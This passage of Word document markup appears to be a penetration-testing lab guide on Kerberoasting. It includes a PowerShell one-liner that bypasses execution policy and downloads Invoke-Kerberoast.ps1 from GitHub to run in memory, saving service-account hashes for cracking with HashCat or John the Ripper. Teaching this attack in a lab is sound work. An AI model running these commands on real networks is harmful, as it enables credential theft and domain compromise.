          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. The output of the command is shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A790D" w14:textId="603E6A28"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53909646" wp14:editId="64CB245A">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="454393336" name="図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0782ABFC" w14:textId="31C89DB1"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CE1D03F">
          <v:shape id="_x0000_i1349" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId21" w:name="DefaultOcxName8" w:shapeid="_x0000_i1349"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>We now want to create a new folder on the desktop and name it as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CA83B" w14:textId="2C7E3171"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2DFEF268" wp14:editId="2BF68CA4">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1929752502" name="図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6F9EB66C" w14:textId="06B16373"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28A63A74">
          <v:shape id="_x0000_i1348" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId23" w:name="DefaultOcxName9" w:shapeid="_x0000_i1348"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Open PowerShell, and move to the directory location in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> as shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C94904" w14:textId="730B49A0"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0C1D303D" wp14:editId="050A3120">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1964526760" name="図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6302FAFD" w14:textId="0558C62F"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6D03B32">
          <v:shape id="_x0000_i1347" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId25" w:name="DefaultOcxName10" w:shapeid="_x0000_i1347"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you are in the PowerShell window and in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> you created, type the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463A244" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>This command requires Internet access, so if you do not have access, you can use the file located in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Downloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> folder. The Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> script is located there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54C2D2" w14:textId="77777777"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -ep bypass -c "IEX (New-Object System.Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>('https://raw.githubusercontent.com/myexploit/PS_Scripts_Backup/master/Invoke-Kerberoast.ps1') ; Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OutputFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashCat|Select-Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExpandProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash | out-file -Encoding ASCII kerb-Hash1.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C2F45E" w14:textId="53057EC6"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0D7BDF5C" wp14:editId="2046B11E">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1820263423"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4D257A36" w14:textId="0EBF636B"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4347901">
          <v:shape id="_x0000_i1346" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId27" w:name="DefaultOcxName11" w:shapeid="_x0000_i1346"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The output of the command shows that the hash of the user is now contained in the folder in a text file as shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CE4F12" w14:textId="44A005DB"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4C12F820" wp14:editId="3A3955DE">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="838098506"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52BC3D21" w14:textId="75E6EAC6"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0EC5B886">
          <v:shape id="_x0000_i1345" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId29" w:name="DefaultOcxName12" w:shapeid="_x0000_i1345"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>By default, any domain user has the rights on a standard domain to request a copy of the service accounts and their correlating password hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8201CB" w14:textId="4A6F3715"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52449870">
          <v:shape id="_x0000_i1344" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId30" w:name="DefaultOcxName13" w:shapeid="_x0000_i1344"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, it is a matter of cracking the password hash, and there are numerous ways to do this. One is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashCat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, which is available in the Parrot machine. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> can also be used; you can choose the method based on your preference. An example of the cracked hash is shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B8451" w14:textId="1E36992A"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2C98DD86" wp14:editId="360CA584">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="505548095"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6B5FDA69" w14:textId="48BFEB2C"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F77398A">
          <v:shape id="_x0000_i1343" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId32" w:name="DefaultOcxName14" w:shapeid="_x0000_i1343"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>So, what about the command that we just executed? An explanation for this follows. The command instructs PS to relaunch. However, this time, set the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to bypass. This enables untrusted scripts to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574AD6D1" w14:textId="6C6437A7"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BE75780">
          <v:shape id="_x0000_i1342" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId33" w:name="DefaultOcxName15" w:shapeid="_x0000_i1342"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System.Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> is used to download the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Invoke-Kerberoast.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> script from the defined location, followed by loading the script into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2006AF" w14:textId="2A437DBC"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514806D">
          <v:shape id="_x0000_i1341" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId34" w:name="DefaultOcxName16" w:shapeid="_x0000_i1341"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Note that you can get this from the Windows Server 2016 machine, and then use it directly with the next command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AD63F6" w14:textId="092FD015"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E8F8E8B">
          <v:shape id="_x0000_i1340" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId35" w:name="DefaultOcxName17" w:shapeid="_x0000_i1340"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OutputFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashCat|Select-Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExpandProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash | out-file -Encoding ASCII kerb-Hash1.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
